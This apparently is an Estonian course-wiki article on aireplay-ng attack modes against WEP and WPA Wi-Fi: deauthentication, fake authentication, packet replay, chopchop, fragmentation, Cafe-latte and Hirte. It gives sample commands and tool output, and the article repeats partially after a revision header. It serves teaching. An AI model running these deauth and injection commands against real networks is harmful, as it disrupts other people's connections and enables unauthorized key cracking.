Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:35:31Z

Tliiv: /* Suunatud */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0 -c CC:CC:CC:CC:CC:CC --ignore-negative-one
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
